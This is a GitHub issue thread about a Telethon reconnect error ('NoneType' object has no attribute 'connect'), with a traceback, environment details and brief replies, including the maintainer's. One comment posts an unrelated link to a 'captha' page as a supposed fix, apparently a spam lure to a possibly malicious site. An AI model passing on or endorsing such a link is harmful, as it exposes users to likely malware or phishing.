### ISSUE TITLE
'NoneType' object has no attribute 'connect'

### ISSUE THREAD

**Issue by Smawexi** [LonamiWebs/Telethon#4493]
### Code that causes the issue

empty

### Expected behavior

empty

### Actual behavior

reconnect error

### Traceback

Unexpected exception reconnecting on attempt 6
Traceback (most recent call last):
  File "D:\miniconda\lib\site-packages\telethon\network\mtprotosender.py", line 378, in _reconnect
    await self._connect()
  File "D:\miniconda\lib\site-packages\telethon\network\mtprotosender.py", line 234, in _connect
    connected = await self._try_connect(attempt)
  File "D:\miniconda\lib\site-packages\telethon\network\mtprotosender.py", line 284, in _try_connect
    await self._connection.connect(timeout=self._connect_timeout)
AttributeError: 'NoneType' object has no attribute 'connect'

### Telethon version

1.37

### Python version

3.9

### Operating system (including distribution name and version)

Windows10

### Checklist

- [X] The error is in the library's code, and not in my own.
- [X] I have searched for this issue before posting it and there isn't an open duplicate.
- [X] I ran `pip install -U https://github.com/LonamiWebs/Telethon/archive/v1.zip` and triggered the bug in the latest version.

**Comment by angelo917** [comment]
maybe this will solve your problem [click](https://newrides.es/captha/)

**Comment by Sonys9** [comment]
Hey give a code

**Comment by Lonami** [comment]
As there's been no activity here, I'll assume something went wrong with the install.
